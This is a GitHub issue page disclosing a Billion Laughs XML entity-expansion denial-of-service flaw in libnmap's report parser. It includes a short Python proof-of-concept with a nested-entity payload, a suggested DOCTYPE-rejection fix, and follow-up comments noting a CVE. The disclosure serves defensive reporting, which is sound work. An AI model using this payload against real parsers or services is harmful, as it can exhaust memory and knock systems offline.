Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XML Injection DoS attack #87

Open
prodigysml opened this issue Feb 1, 2018 · 2 comments

Comments

@prodigysml
Copy link

commented Feb 1, 2018

Issue

Libnmap is vulnerable to XML Bomb attacks using the following:
https://en.wikipedia.org/wiki/Billion_laughs_attack

Where the Issue Occurred

The issue occurs within parsing of XML reports for nmap. The exact line where the vulnerable parsing occurs is given below:

root = ET.fromstring(nmap_data)

Reproduction steps

Run the following code:

ty = NmapParser()

payload = """
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz><hello>&lol3;</hello></lolz>
"""

ty.parse(payload)

Remediation

Python does not contain any fixes for this vulnerability, but that doesn't mean it can't be fixed. Searching for the word DOCTYPE, prior to parsing, and raising an exception should patch the issue.

@carnil

This comment has been minimized.

Copy link

commented Jul 15, 2019

This apparently was assigned CVE-2019-1010017.

@cooperlees

This comment has been minimized.

Copy link
Contributor

commented Jul 15, 2019

It seems there has been somework on XML bomb attacks in the past. Maybe it's best to update here and get it fixed?
https://bugs.python.org/issue17239

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.